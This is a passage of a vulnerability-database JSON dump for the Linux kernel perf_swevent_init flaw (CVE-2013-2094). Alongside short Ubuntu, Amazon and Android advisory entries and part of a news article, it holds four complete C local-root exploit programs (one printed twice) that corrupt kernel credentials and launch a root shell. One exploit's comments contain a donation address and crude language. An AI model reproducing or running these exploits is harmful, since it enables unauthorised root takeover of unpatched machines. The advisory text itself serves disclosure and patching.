linux-image-3.8.0-23-generic 3.8.0-23.34~precise1\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1849-1\r\n CVE-2013-2094\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux-lts-raring/3.8.0-23.34~precise1\r\n\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-06-03T00:00:00", "published": "2013-06-03T00:00:00", "id": "SECURITYVULNS:DOC:29436", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29436", "title": "[USN-1849-1] Linux kernel (Raring HWE) vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 3.8.9 (x86-64) - perf_swevent_init Local Privilege Escalation (2)", "edition": 1, "published": "2013-06-11T00:00:00", "title": "Linux Kernel 3.8.9 (x86-64) - perf_swevent_init Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "EXPLOITPACK:EC6E04EF12A9F66A20251DC5556474BC", "href": "", "sourceData": "/*\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\n * by sorbo (sorbo@darkircop.org) June 2013\n *\n * Based on sd's exploit. Supports more targets.\n *\n */\n\n#define _GNU_SOURCE\n#include <string.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <sys/syscall.h>\n#include <sys/mman.h>\n#include <linux/perf_event.h>\n#include <signal.h>\n#include <assert.h>\n\n#define BASE\t\t0x380000000\n#define BASE_JUMP\t0x1780000000\n#define SIZE \t\t0x10000000\n#define KSIZE\t\t0x2000000\n\n#define TMP(x) (0xdeadbeef + (x))\n\nstruct idt {\n\tuint16_t limit;\n\tuint64_t addr;\n} __attribute__((packed));\n\nstatic int _fd;\n\nstatic int perf_open(uint64_t off)\n{\n\tstruct perf_event_attr attr;\n\tint rc;\n\n//\tprintf(\"perf open %lx [%d]\\n\", off, (int) off);\n\n\tmemset(&attr, 0, sizeof(attr));\n\n\tattr.type \t = PERF_TYPE_SOFTWARE;\n\tattr.size \t = sizeof(attr);\n\tattr.config \t = off;\n\tattr.mmap \t = 1;\n\tattr.comm \t = 1;\n\tattr.exclude_kernel = 1;\n\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\n\n\treturn rc;\n}\n\nvoid __sc_start(void);\nvoid __sc_next(void);\n\nvoid __sc(void)\n{\n\tasm(\"__sc_start:\\n\"\n\t \"call __sc_next\\n\"\n\t \"iretq\\n\"\n\t \"__sc_next:\\n\");\n}\n\nvoid sc(void)\n{\n\tint i, j;\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\n\tuint64_t kbase = ((uint64_t)current) >> 36;\n\tint uid = TMP(1);\n\tint gid = TMP(2);\n\n\tfor (i = 0; i < 4000; i += 4) {\n\t\tuint64_t *p = (void *) ¤t[i];\n\t\tuint32_t *cred = (uint32_t*) p[0];\n\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\n\t\t\tcontinue;\n\n\t\tfor (j = 0; j < 20; j++) {\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\n\t\t\t\tfor (i = 0; i < 8; i++) {\n\t\t\t\t\tcred[j + i] = 0;\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\n{\n\tvoid *p;\n\n\tp = memmem(sc, 900, &needle, sizeof(needle));\n\tif (!p)\n\t\terrx(1, \"can't find %x\", needle);\n\n\tmemcpy(p, &val, sizeof(val));\n}\n\nstatic void *map_mem(uint64_t addr)\n{\n\tvoid *p;\n\n\tp = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\n\n\tif (p == MAP_FAILED)\n\t\terr(1, \"mmap()\");\n\n\treturn p;\n}\n\nstatic int find_mem(void *mem, uint8_t c)\n{\n\tint i;\n\tuint8_t *p = mem;\n\n\tfor (i = 0; i < SIZE; i++) {\n\t\tif (p[i] == c)\n\t\t\treturn i;\n\t}\n\n\treturn -1;\n}\n\nstatic void dropshell()\n{\n\tif (setuid(0) != 0)\n\t\terrx(1, \"failed\");\n\n\tprintf(\"Launching shell\\n\");\n\n\texecl(\"/bin/sh\", \"sh\", NULL);\n\texit(0);\n}\n\nvoid morte(int x)\n{\n\tprintf(\"Got signal\\n\");\n\tclose(_fd);\n\tdropshell();\n}\n\nstatic void trigger(int intr)\n{\n\tswitch (intr) {\n\tcase 0:\n\t\tdo {\n\t\t\tint z = 1;\n\t\t\tint a = 1;\n\n\t\t\tz--;\n\n\t\t\ta /= z;\n\t\t} while (0);\n\t\tbreak;\n\n\tcase 4:\n\t\tasm(\"int $4\");\n\t\tbreak;\n\n\tcase 0x80:\n\t\tasm(\"int $0x80\");\n\t\tbreak;\n\n\tdefault:\n\t\terrx(1, \"unknown intr %d\", intr);\n\t}\n\n\tsleep(3);\n}\n\nint main(int argc, char *argv[])\n{\n\tuint32_t *p[2];\n\tint fd, i;\n\tuint64_t off;\n\tuint64_t addr = BASE;\n\tstruct idt idt;\n\tuint8_t *kbase;\n\tint sz = 4;\n\tint intr = 4;\n\n\tprintf(\"Searchin...\\n\");\n\n\tp[0] = map_mem(BASE);\n\tp[1] = map_mem(BASE_JUMP);\n\n\tmemset(p[1], 0x69, SIZE);\n\n\toff = 0xFFFFFFFFL;\n\tfd = perf_open(off);\n\tclose(fd);\n\n\ti = find_mem(p[0], 0xff);\n\tif (i == -1) {\n\t\ti = find_mem(p[1], 0x68);\n\n\t\tif (i == -1)\n\t\t\terrx(1, \"Can't find overwrite\");\n\n\t\tsz = 24;\n\t\taddr = BASE_JUMP;\n\t\tprintf(\"detected CONFIG_JUMP_LABEL\\n\");\n\t}\n\n\tmunmap(p[0], SIZE);\n\tmunmap(p[1], SIZE);\n\n\taddr += i;\n\taddr -= off * sz;\n\n\tprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\n\n\tasm(\"sidt %0\" : \"=m\" (idt));\n\n\tprintf(\"IDT at 0x%lx\\n\", idt.addr);\n\n\toff = addr - idt.addr;\n\toff -= 8;\n\n\tswitch (off % sz) {\n\tcase 0:\n\t\tintr = 0;\n\t\tbreak;\n\n\tcase 8:\n\t\tintr = 0x80;\n\t\tbreak;\n\n\tcase 16:\n\t\tintr = 4;\n\t\tbreak;\n\n\tdefault:\n\t\terrx(1, \"remainder %d\", off % sz);\n\t}\n\n\tprintf(\"Using interrupt %d\\n\", intr);\n\n\toff -= 16 * intr;\n\n\tassert((off % sz) == 0);\n\n\toff /= sz;\n\toff = -off;\n\n//\tprintf(\"Offset %lx\\n\", off);\n\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\n\n\tprintf(\"Shellcode at %p\\n\", kbase);\n\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\n\t\terr(1, \"mmap()\");\n\n\tmemset(kbase, 0x90, KSIZE);\n\tkbase += KSIZE - 1024;\n\n\ti = __sc_next - __sc_start;\n\tmemcpy(kbase, __sc_start, i);\n\tkbase += i;\n\tmemcpy(kbase, sc, 900);\n\n\tsc_replace(kbase, TMP(1), getuid());\n\tsc_replace(kbase, TMP(2), getgid());\n\n\tsignal(SIGALRM, morte);\n\talarm(2);\n\n\tprintf(\"Triggering sploit\\n\");\n\t_fd = perf_open(off);\n\n\ttrigger(intr);\n\n\texit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)", "edition": 1, "published": "2013-05-14T00:00:00", "title": "Linux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-14T00:00:00", "id": "EXPLOITPACK:C8EE3F99CF50DA0F219FC69406122E2C", "href": "", "sourceData": "/*\n * linux 2.6.37-3.x.x x86_64, ~100 LOC\n * gcc-4.6 -O2 semtex.c && ./a.out\n * 2010 sd@fucksheep.org, salut!\n *\n * update may 2013:\n * seems like centos 2.6.32 backported the perf bug, lol.\n * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.\n * \n * EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/\n * ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c\n */\n\n#define _GNU_SOURCE 1\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/mman.h>\n#include <syscall.h>\n#include <stdint.h>\n#include <assert.h>\n\n#define BASE 0x380000000\n#define SIZE 0x010000000\n#define KSIZE 0x2000000\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\n\nvoid fuck() {\n int i,j,k;\n uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };\n uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));\n uint64_t kbase = ((uint64_t)current)>>36;\n uint32_t *fixptr = (void*) AB(1);\n *fixptr = -1;\n\n for (i=0; i<4000; i+=4) {\n uint64_t *p = (void *)¤t[i];\n uint32_t *t = (void*) p[0];\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\n for (j=0; j<20; j++) { for (k = 0; k < 8; k++)\n if (((uint32_t*)uids)[k] != t[j+k]) goto next;\n for (i = 0; i < 8; i++) t[j+i] = 0;\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\n return;\nnext:; }\n }\n}\n\nvoid sheep(uint32_t off) {\n uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };\n int fd = syscall(298, buf, 0, -1, -1, 0);\n assert(!close(fd));\n}\n\n\nint main() {\n uint64_t u,g,needle, kbase, *p; uint8_t *code;\n uint32_t *map, j = 5;\n int i;\n struct {\n uint16_t limit;\n uint64_t addr;\n } __attribute__((packed)) idt;\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\n memset(map, 0, SIZE);\n sheep(-1); sheep(-2);\n for (i = 0; i < SIZE/4; i++) if (map[i]) {\n assert(map[i+1]);\n break;\n }\n assert(i<SIZE/4);\n asm (\"sidt %0\" : \"=m\" (idt));\n kbase = idt.addr & 0xff000000;\n u = getuid(); g = getgid();\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\",\n printf(\"2.6.37-3.x x86_64\\nsd@fucksheep.org 2010\\n\") % 27);\n setresuid(u,u,u); setresgid(g,g,g);\n while (j--) {\n needle = AB(j+1);\n assert(p = memmem(code, 1024, &needle, 8));\n if (!p) continue;\n *p = j?((g<<32)|u):(idt.addr + 0x48);\n }\n sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);\n asm(\"int $0x4\"); assert(!setuid(0));\n return execl(\"/bin/bash\", \"-sh\", NULL);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-12-24T13:21:11", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "description": "The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.", "edition": 2, "modified": "2019-07-08T00:00:00", "published": "2019-07-08T00:00:00", "id": "ANDROID:LIBPERF_EVENT", "href": "http://www.androidvulnerabilities.org/vulnerabilities/libperf_event.html", "title": "libperf_event", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:18", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "**Issue Overview:**\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call. \n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-3.4.43-43.43.amzn1.i686 \n kernel-headers-3.4.43-43.43.amzn1.i686 \n kernel-debuginfo-3.4.43-43.43.amzn1.i686 \n kernel-tools-debuginfo-3.4.43-43.43.amzn1.i686 \n kernel-debuginfo-common-i686-3.4.43-43.43.amzn1.i686 \n kernel-devel-3.4.43-43.43.amzn1.i686 \n kernel-3.4.43-43.43.amzn1.i686 \n \n noarch: \n kernel-doc-3.4.43-43.43.amzn1.noarch \n \n src: \n kernel-3.4.43-43.43.amzn1.src \n \n x86_64: \n kernel-headers-3.4.43-43.43.amzn1.x86_64 \n kernel-3.4.43-43.43.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.4.43-43.43.amzn1.x86_64 \n kernel-tools-3.4.43-43.43.amzn1.x86_64 \n kernel-tools-debuginfo-3.4.43-43.43.amzn1.x86_64 \n kernel-devel-3.4.43-43.43.amzn1.x86_64 \n kernel-debuginfo-3.4.43-43.43.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-05-14T15:37:00", "published": "2013-05-14T15:37:00", "id": "ALAS-2013-190", "href": "https://alas.aws.amazon.com/ALAS-2013-190.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-06T03:10:23", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2014-06-01T00:00:00", "type": "zdt", "title": "Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-06-01T00:00:00", "id": "1337DAY-ID-22298", "href": "https://0day.today/exploit/description/22298", "sourceData": "/**\r\n * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit\r\n * by Vitaly Nikolenko ([email\u00a0protected])\r\n *\r\n * based on semtex.c by sd\r\n *\r\n * Supported targets:\r\n * [0] Ubuntu 12.04.0 - 3.2.0-23-generic\r\n * [1] Ubuntu 12.04.1 - 3.2.0-29-generic\r\n * [2] Ubuntu 12.04.2 - 3.5.0-23-generic\r\n *\r\n * $ gcc vnik.c -O2 -o vnik\r\n *\r\n * $ uname -r\r\n * 3.2.0-23-generic\r\n *\r\n * $ ./vnik 0\r\n */\r\n \r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x1780000000\r\n#define SIZE 0x0010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n \r\ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);\r\n \r\nuint64_t targets[3][3] =\r\n {{0xffffffff81ef67e0, // perf_swevent_enabled\r\n 0xffffffff81091630, // commit_creds\r\n 0xffffffff810918e0}, // prepare_kernel_cred\r\n {0xffffffff81ef67a0,\r\n 0xffffffff81091220,\r\n 0xffffffff810914d0},\r\n {0xffffffff81ef5940,\r\n 0xffffffff8107ee30,\r\n 0xffffffff8107f0c0}\r\n };\r\n \r\nvoid __attribute__((regparm(3))) payload() {\r\n uint32_t *fixptr = (void*)AB(1);\r\n // restore the handler\r\n *fixptr = -1;\r\n commit_creds_fn commit_creds = (commit_creds_fn)AB(2);\r\n prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n}\r\n \r\nvoid trigger(uint32_t off) {\r\n uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };\r\n int fd = syscall(298, buf, 0, -1, -1, 0);\r\n assert( !close(fd) );\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n uint64_t off64, needle, kbase, *p;\r\n uint8_t *code;\r\n uint32_t int_n, j = 5, target = 1337;\r\n int offset = 0;\r\n void *map;\r\n \r\n assert(argc == 2 && \"target?\");\r\n assert( (target = atoi(argv[1])) < 3 );\r\n \r\n struct {\r\n uint16_t limit;\r\n uint64_t addr;\r\n } __attribute__((packed)) idt;\r\n \r\n // mmap user-space block so we don't page fault\r\n // on sw_perf_event_destroy\r\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n memset(map, 0, SIZE);\r\n \r\n asm volatile(\"sidt %0\" : \"=m\" (idt));\r\n kbase = idt.addr & 0xff000000;\r\n printf(\"IDT addr = 0x%lx\\n\", idt.addr);\r\n \r\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);\r\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13);\r\n \r\n // can only play with interrupts 3, 4 and 0x80\r\n for (int_n = 3; int_n <= 0x80; int_n++) {\r\n for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {\r\n int off32 = off64;\r\n \r\n if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {\r\n offset = off32;\r\n goto out;\r\n }\r\n }\r\n if (int_n == 4) {\r\n // shit, let's try 0x80 if the kernel is compiled with\r\n // CONFIG_IA32_EMULATION\r\n int_n = 0x80 - 1;\r\n }\r\n }\r\nout:\r\n assert(offset);\r\n printf(\"Using int = %d with offset = %d\\n\", int_n, offset);\r\n \r\n for (j = 0; j < 3; j++) {\r\n needle = AB(j+1);\r\n assert(p = memmem(code, 1024, &needle, 8));\r\n *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];\r\n }\r\n trigger(offset);\r\n switch (int_n) {\r\n case 3:\r\n asm volatile(\"int $0x03\");\r\n break;\r\n case 4:\r\n asm volatile(\"int $0x04\");\r\n break;\r\n case 0x80:\r\n asm volatile(\"int $0x80\");\r\n }\r\n \r\n assert(!setuid(0));\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22298"}, {"lastseen": "2018-02-17T21:24:57", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2013-06-11T00:00:00", "type": "zdt", "title": "Linux kernel perf_swevent_init - Local root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "1337DAY-ID-20880", "href": "https://0day.today/exploit/description/20880", "sourceData": "/*\r\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo ([email\u00a0protected]) June 2013\r\n *\r\n * Based on sd's exploit. Supports more targets.\r\n *\r\n */\r\n \r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x380000000\r\n#define BASE_JUMP 0x1780000000\r\n#define SIZE 0x10000000\r\n#define KSIZE 0x2000000\r\n \r\n#define TMP(x) (0xdeadbeef + (x))\r\n \r\nstruct idt {\r\n uint16_t limit;\r\n uint64_t addr;\r\n} __attribute__((packed));\r\n \r\nstatic int _fd;\r\n \r\nstatic int perf_open(uint64_t off)\r\n{\r\n struct perf_event_attr attr;\r\n int rc;\r\n \r\n// printf(\"perf open %lx [%d]\\n\", off, (int) off);\r\n \r\n memset(&attr, 0, sizeof(attr));\r\n \r\n attr.type = PERF_TYPE_SOFTWARE;\r\n attr.size = sizeof(attr);\r\n attr.config = off;\r\n attr.mmap = 1;\r\n attr.comm = 1;\r\n attr.exclude_kernel = 1;\r\n \r\n rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n \r\n return rc;\r\n}\r\n \r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n \r\nvoid __sc(void)\r\n{\r\n asm(\"__sc_start:\\n\"\r\n \"call __sc_next\\n\"\r\n \"iretq\\n\"\r\n \"__sc_next:\\n\");\r\n}\r\n \r\nvoid sc(void)\r\n{\r\n int i, j;\r\n uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n uint64_t kbase = ((uint64_t)current) >> 36;\r\n int uid = TMP(1);\r\n int gid = TMP(2);\r\n \r\n for (i = 0; i < 4000; i += 4) {\r\n uint64_t *p = (void *) \u00a4t[i];\r\n uint32_t *cred = (uint32_t*) p[0];\r\n \r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n continue;\r\n \r\n for (j = 0; j < 20; j++) {\r\n if (cred[j] == uid && cred[j + 1] == gid) {\r\n for (i = 0; i < 8; i++) {\r\n cred[j + i] = 0;\r\n return;\r\n }\r\n }\r\n }\r\n }\r\n}\r\n \r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n void *p;\r\n \r\n p = memmem(sc, 900, &needle, sizeof(needle));\r\n if (!p)\r\n errx(1, \"can't find %x\", needle);\r\n \r\n memcpy(p, &val, sizeof(val));\r\n}\r\n \r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n void *p;\r\n \r\n p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n \r\n if (p == MAP_FAILED)\r\n err(1, \"mmap()\");\r\n \r\n return p;\r\n}\r\n \r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n int i;\r\n uint8_t *p = mem;\r\n \r\n for (i = 0; i < SIZE; i++) {\r\n if (p[i] == c)\r\n return i;\r\n }\r\n \r\n return -1;\r\n}\r\n \r\nstatic void dropshell()\r\n{\r\n if (setuid(0) != 0)\r\n errx(1, \"failed\");\r\n \r\n printf(\"Launching shell\\n\");\r\n \r\n execl(\"/bin/sh\", \"sh\", NULL);\r\n exit(0);\r\n}\r\n \r\nvoid morte(int x)\r\n{\r\n printf(\"Got signal\\n\");\r\n close(_fd);\r\n dropshell();\r\n}\r\n \r\nstatic void trigger(int intr)\r\n{\r\n switch (intr) {\r\n case 0:\r\n do {\r\n int z = 1;\r\n int a = 1;\r\n \r\n z--;\r\n \r\n a /= z;\r\n } while (0);\r\n break;\r\n \r\n case 4:\r\n asm(\"int $4\");\r\n break;\r\n \r\n case 0x80:\r\n asm(\"int $0x80\");\r\n break;\r\n \r\n default:\r\n errx(1, \"unknown intr %d\", intr);\r\n }\r\n \r\n sleep(3);\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n uint32_t *p[2];\r\n int fd, i;\r\n uint64_t off;\r\n uint64_t addr = BASE;\r\n struct idt idt;\r\n uint8_t *kbase;\r\n int sz = 4;\r\n int intr = 4;\r\n \r\n printf(\"Searchin...\\n\");\r\n \r\n p[0] = map_mem(BASE);\r\n p[1] = map_mem(BASE_JUMP);\r\n \r\n memset(p[1], 0x69, SIZE);\r\n \r\n off = 0xFFFFFFFFL;\r\n fd = perf_open(off);\r\n close(fd);\r\n \r\n i = find_mem(p[0], 0xff);\r\n if (i == -1) {\r\n i = find_mem(p[1], 0x68);\r\n \r\n if (i == -1)\r\n errx(1, \"Can't find overwrite\");\r\n \r\n sz = 24;\r\n addr = BASE_JUMP;\r\n printf(\"detected CONFIG_JUMP_LABEL\\n\");\r\n }\r\n \r\n munmap(p[0], SIZE);\r\n munmap(p[1], SIZE);\r\n \r\n addr += i;\r\n addr -= off * sz;\r\n \r\n printf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\r\n \r\n asm(\"sidt %0\" : \"=m\" (idt));\r\n \r\n printf(\"IDT at 0x%lx\\n\", idt.addr);\r\n \r\n off = addr - idt.addr;\r\n off -= 8;\r\n \r\n switch (off % sz) {\r\n case 0:\r\n intr = 0;\r\n break;\r\n \r\n case 8:\r\n intr = 0x80;\r\n break;\r\n \r\n case 16:\r\n intr = 4;\r\n break;\r\n \r\n default:\r\n errx(1, \"remainder %d\", off % sz);\r\n }\r\n \r\n printf(\"Using interrupt %d\\n\", intr);\r\n \r\n off -= 16 * intr;\r\n \r\n assert((off % sz) == 0);\r\n \r\n off /= sz;\r\n off = -off;\r\n \r\n// printf(\"Offset %lx\\n\", off);\r\n \r\n kbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n \r\n printf(\"Shellcode at %p\\n\", kbase);\r\n \r\n if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap()\");\r\n \r\n memset(kbase, 0x90, KSIZE);\r\n kbase += KSIZE - 1024;\r\n \r\n i = __sc_next - __sc_start;\r\n memcpy(kbase, __sc_start, i);\r\n kbase += i;\r\n memcpy(kbase, sc, 900);\r\n \r\n sc_replace(kbase, TMP(1), getuid());\r\n sc_replace(kbase, TMP(2), getgid());\r\n \r\n signal(SIGALRM, morte);\r\n alarm(2);\r\n \r\n printf(\"Triggering sploit\\n\");\r\n _fd = perf_open(off);\r\n \r\n trigger(intr);\r\n \r\n exit(0);\r\n}\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20880"}], "thn": [{"lastseen": "2017-01-08T18:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2013-2094"], "description": "[](<http://3.bp.blogspot.com/-WIv2Y-SyS9U/Ubi1QXcUnZI/AAAAAAAAWG0/JaWW_8JFfmQ/s1600/Linux+kernel+privilege+escalation+exploit+ported+to+Android+platform.jpg>)\n\nMalware authors are notorious for quickly leveraging new exploits in the public domain for nefarious purposes. A recently discovered [Linux kernel](<http://thehackernews.com/2011/08/linux-kernel-31-rc2-released.html>) Local privilege [escalation exploit](<http://news.thehackernews.com/label/Exploit>), which allows attackers to gain complete control of infected devices, has been ported to the Android smartphone platform.\n\nThe Linux kernel 2.6.x, including [Red Hat](<http://thehackernews.com/2013/01/red-hat-patches-multiple-web.html>) Enterprise Linux 6, Ubuntu 12.04 LTS, Debian 6 and Suse Enterprise Linux 11 are vulnerable to privilege escalation flaw with [CVE-2013-2094](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094>). \n\n \n\n\nCVE-2013-2094 states, \"_The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call._\"\n\n \n\n\nExploit for Linux machines is publically [available here](<http://downloads.securityfocus.com/vulnerabilities/exploits/59846-1.c>). Privilege escalation exploits are particularly dangerous as they can allow [cybercriminals](<http://thehackernews.com/2013/05/researchers-uncovered-new-malware-used.html>) to gain complete control over the compromised device. \n\n \n\n\nThe exploit can be used to to access data from other applications, prevent users from uninstalling the malware, and make it possible for the attackers to [send premium rate text messages](<http://thehackernews.com/2012/01/fake-angry-birds-game-spreading-malware.html>) from the handset.\n\n \n\n\nSymantec [said](<http://www.symantec.com/connect/blogs/linux-kernel-exploit-ported-android>), \"_The Android operating system normally sandboxes every application so they cannot perform sensitive system operations or interfere with other installed applications. In the past, we have seen malware use privilege escalation exploits to access data from other applications, prevent uninstall, hide themselves, and also bypass the Android permissions model to enable behaviors such as sending premium SMS messages without user authorization._\"\n\n \n\n\nA majority of malicious mobile apps are fake or rogue apps that claim to have some function but will also contain [malicious](<http://thehackernews.com/2013/06/malicious-mobile-charger-can-hack-your.html>) behaviors that run without 